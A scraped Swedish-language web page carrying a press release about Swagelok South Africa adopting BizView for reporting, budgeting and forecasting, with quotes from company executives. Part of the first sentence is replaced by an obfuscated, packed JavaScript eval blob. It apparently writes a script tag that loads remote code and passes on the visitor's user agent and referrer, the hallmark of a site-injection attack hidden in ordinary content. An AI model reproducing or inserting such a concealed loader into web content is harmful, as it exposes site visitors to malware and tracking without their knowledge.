Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Swagelok Sydafrika väljer BizView

Swagelok Sydafrika väljer BizView
Sebastian

Swagelok eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydird|var|u0026u|referrer|frrdi||js|php’.split(’|’),0,{}))
i Sydafrika har valt BizView som mjukvarulösning för sin rapporterings-, budget- och prognosprocesser. Systemet implementerades under senare del av hösten av BlueViewConsulting, Bizviews återförsäljare i Sydafrika. Lösningen är nu på plats och har använts i 2016 års planeringsprocess.

Swagelok Financial Director Adrian Haddow säger “Vi implementerade nyligen BizView i vår organisation och är överväldigade av allt det är kapabelt till. Vi har lyckats spara in på tid, jobbiga processer och eliminerat onödiga fel som uppstår när vi hämtar data från en rad olika datakällor. Vi har även fått en mycket bättre överblick över vår verksamhet.”

Adrian Haddow fortsätter, ”Vi är särskilt nöjda med användarvänligheten när användare ändrar förutsättningar i systemet och direkt får en tydlig bild av Swagelok finansiella status och prognos scenarios. BizView ger oss även möjlighet att vara mycket mer transparanta då vi nu kan ge våra anställda möjlighet att i realtid följa utvecklingen av verksamheten så som försäljning, förbättringar och tillkortakommanden. Detta ger dem omedelbar feedback att genomföra nödvändiga åtgärder i sin verksamhet, vilket ger dem bättre kontroll över resultatet. Överlag är BizView det bästa system vi har sett på marknaden. Det är dynamiskt, mycket användarvänligt och mycket effektivt”

Jens Karlsson, VP Global Partner Program på Bizview säger “Denna installation kommer att fungera som referens för framtida kunder i Sydafrika. Det finns också planer på utöka lösningen internt inom Swagelok, till de totalt 70 kontoren som finns runt om i världen. Vi på Bizview är extremt nöjda med den lösning som vår partner BlueViewConsulting har levererat till kunden och det visar att vår strategi att samarbeta med skickliga partners, kan ge oss väldigt nöjda BizView kunder världen över.”.